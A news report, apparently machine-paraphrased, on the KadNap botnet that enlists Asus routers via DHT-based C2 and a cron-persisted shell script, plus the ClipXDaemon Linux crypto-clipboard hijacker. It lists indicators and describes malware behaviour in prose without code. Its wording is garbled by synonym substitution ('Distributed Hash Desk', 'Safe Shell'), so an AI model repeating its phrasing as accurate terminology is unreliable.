Cybersecurity researchers have found a brand new malware referred to as KadNap that is primarily focusing on Asus routers to enlist them right into a botnet for proxying malicious site visitors.
The malware, first detected within the wild in August 2025, has expanded to over 14,000 contaminated gadgets, with greater than 60% of victims situated within the U.S., in line with the Black Lotus Labs staff at Lumen. A lesser variety of infections have been detected in Taiwan, Hong Kong, Russia, the U.Okay., Australia, Brazil, France, Italy, and Spain.
“KadNap employs a customized model of the Kademlia Distributed Hash Desk (DHT) protocol, which is used to hide the IP deal with of their infrastructure inside a peer-to-peer system to evade conventional community monitoring,” the cybersecurity firm mentioned in a report shared with The Hacker Information.
Compromised nodes within the community leverage the DHT protocol to find and join with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts.
As soon as gadgets are efficiently compromised, they’re marketed by a proxy service named Doppelgänger (“doppelganger[.]store”), which is assessed to be a rebrand of Faceless, one other proxy service related to TheMoon malware. Doppelgänger, in line with its web site, claims to supply resident proxies in over 50 nations that present “100% anonymity.” The service is claimed to have launched in Might/June 2025.
Regardless of the concentrate on Asus routers, the operators of KadNap have been discovered to deploy the malware towards an assorted set of edge networking gadgets.
Central to the assault is a shell script (“aic.sh”) that is downloaded from the C2 server (“212.104.141[.]140”), which is liable for initiating the method of conscripting the sufferer to the P2P community. The file creates a cron job to retrieve the shell script from the server on the 55-minute mark of each hour, rename it to “.asusrouter,” and run it.
As soon as persistence is established, the script pulls a malicious ELF file, renames it to “kad,” and executes it. This, in flip, results in the deployment of KadNap. The malware is able to focusing on gadgets operating each ARM and MIPS processors.
KadNap can be designed to hook up with a Community Time Protocol (NTP) server to fetch the present time and retailer it together with the host uptime. This data serves as a foundation to create a hash that is used to find different friends within the decentralized community to obtain instructions or obtain extra information.
The information – fwr.sh and /tmp/.sose – comprises performance to shut port 22, the usual TCP port for Safe Shell (SSH), on the contaminated gadget and extract an inventory of C2 IP deal with:port combos to hook up with.
“Briefly, the revolutionary use of the DHT protocol permits the malware to determine sturdy communication channels which are troublesome to disrupt, by hiding within the noise of reliable peer-to-peer site visitors,” Lumen mentioned.
Additional evaluation has decided that not all compromised gadgets talk with each C2 server, indicating the infrastructure is being categorized based mostly on gadget kind and fashions.
The Black Lotus Labs staff instructed The Hacker Information that Doppelgänger’s bots are being abused by risk actors within the wild. “One problem there was since these Asus (and different gadgets) are additionally generally co-infected with different malware, it’s tough to say who precisely is liable for a particular malicious exercise,” the corporate mentioned.
Customers operating SOHO routers are suggested to maintain their gadgets updated, reboot them frequently, change default passwords, safe administration interfaces, and substitute fashions which are end-of-life and are now not supported.
“The KadNap botnet stands out amongst others that assist nameless proxies in its use of a peer-to-peer community for decentralized management,” Lumen concluded. “Their intention is obvious, keep away from detection and make it troublesome for defenders to guard towards.”
New Linux Risk ClipXDaemon Emerges
The disclosure comes as Cyble detailed a brand new Linux risk dubbed ClipXDaemon that is designed to focus on cryptocurrency customers by intercepting and altering copied pockets addresses. The clipper malware, delivered by way of Linux post-exploitation framework referred to as ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker focusing on Linux X11 environments.
Staged totally in reminiscence, the malware employs stealth methods, resembling course of masquerading and Wayland session avoidance, whereas concurrently monitoring the clipboard each 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It is able to focusing on Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.
The choice to keep away from execution in Wayland classes is deliberate, because the show server protocol’s safety structure locations extra controls, like requiring express consumer interplay, earlier than purposes can entry the clipboard content material. In disabling itself below such situations, the malware goals to eradicate noise and keep away from runtime failure.
“ClipXDaemon differs essentially from conventional Linux malware. It comprises no command-and-control (C2) logic, performs no beaconing, and requires no distant tasking,” the corporate mentioned. “As a substitute, it monetizes victims immediately by hijacking cryptocurrency pockets addresses copied in X11 classes and changing them in actual time with attacker-controlled addresses.”
